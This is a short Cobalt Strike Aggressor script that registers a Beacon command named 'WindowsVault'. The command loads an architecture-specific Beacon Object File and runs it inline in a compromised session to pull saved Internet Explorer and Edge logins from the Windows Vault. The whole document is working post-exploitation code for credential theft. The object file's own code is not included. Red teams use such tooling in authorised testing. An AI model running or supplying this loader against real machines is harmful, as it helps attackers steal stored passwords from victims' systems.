#WindowsVault

beacon_command_register("WindowsVault", "Retrieve Vault Credentials",
    	"Retrieve credentials saved in the Windows Vault (i.e. logins from Internet Explorer and Edge).");	

alias WindowsVault {
	local('$handle $data $args');
	
	$bid = $1;

	# figure out the arch of this session
	$barch  = barch($1);

	# read in the right BOF file
	$handle = openf(script_resource("WindowsVault.".$barch.".o"));
	$data = readb($handle, -1);
	closef($handle);

	# pack our arguments
	$args = bof_pack($bid, "z", $2);
	
	btask($bid, "WindowsVault (@guervild)");
	
	# execute it.
	beacon_inline_execute($bid, $data, "go", $args);
}